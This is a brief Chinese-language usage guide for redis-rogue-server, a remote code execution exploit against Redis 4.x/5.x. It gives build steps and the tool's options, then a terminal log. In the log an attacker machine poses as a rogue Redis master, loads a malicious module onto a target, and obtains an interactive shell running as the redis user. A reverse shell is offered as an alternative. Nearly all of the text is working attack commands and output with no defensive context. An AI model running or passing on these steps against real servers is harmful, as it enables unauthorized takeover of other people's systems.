Redis-Rogue-Server使用

GitHub - n0b0dyCN/redis-rogue-server: Redis(<=5.0.5) RCE
使用参考 1.redis未授权利用方式

先编译,自带编译好了的

cd RedisModulesSDK/exp/
make

用法: redis-master.py [-h] -r RHOST [-p RPORT] -L LHOST [-P LPORT] [-f FILE] [-c COMMAND] [-a AUTH] [-v]

Redis 4.x/5.x 远程代码执行(利用RedisModules)
选项 描述
-h, --help 显示帮助信息并退出
--rhost=REMOTE_HOST 目标主机IP​(必填)
--rport=REMOTE_PORT 目标Redis端口,默认 6379
--lhost=LOCAL_HOST 攻击服务器IP​(必填)
--lport=LOCAL_PORT 攻击服务器监听端口,默认 21000
--exp=EXP_FILE 要加载的Redis模块文件,默认 exp.so
-v, --verbose 显示完整数据流​(调试模式)

0.1. 直接RCE

┌──(root㉿kali)-[~/Desktop/tools/Redis/redis-rogue-server]
└─# python3 redis-rogue-server.py --rhost 192.168.8.37 --lhost 192.168.8.10
/root/Desktop/tools/Redis/redis-rogue-server/redis-rogue-server.py:10: SyntaxWarning: invalid escape sequence '\ '
  BANNER = """______         _ _      ______                         _____
______         _ _      ______                         _____                          
| ___ \       | (_)     | ___ \                       /  ___|                         
| |_/ /___  __| |_ ___  | |_/ /___   __ _ _   _  ___  \ `--.  ___ _ ____   _____ _ __ 
|    // _ \/ _` | / __| |    // _ \ / _` | | | |/ _ \  `--. \/ _ \ '__\ \ / / _ \ '__|
| |\ \  __/ (_| | \__ \ | |\ \ (_) | (_| | |_| |  __/ /\__/ /  __/ |   \ V /  __/ |   
\_| \_\___|\__,_|_|___/ \_| \_\___/ \__, |\__,_|\___| \____/ \___|_|    \_/ \___|_|   
                                     __/ |                                            
                                    |___/                                             
@copyright n0b0dy @ r3kapig

[info] TARGET 192.168.8.37:6379
[info] SERVER 192.168.8.10:21000
[info] Setting master...
[info] Setting dbfilename...
[info] Loading module...
[info] Temerory cleaning up...
What do u want, [i]nteractive shell or [r]everse shell: i
[info] Interact mode start, enter "exit" to quit.
[<<] id
[>>] =uid=999(redis) gid=999(redis) groups=999(redis)
[<<] whoami
[>>] redis
[<<]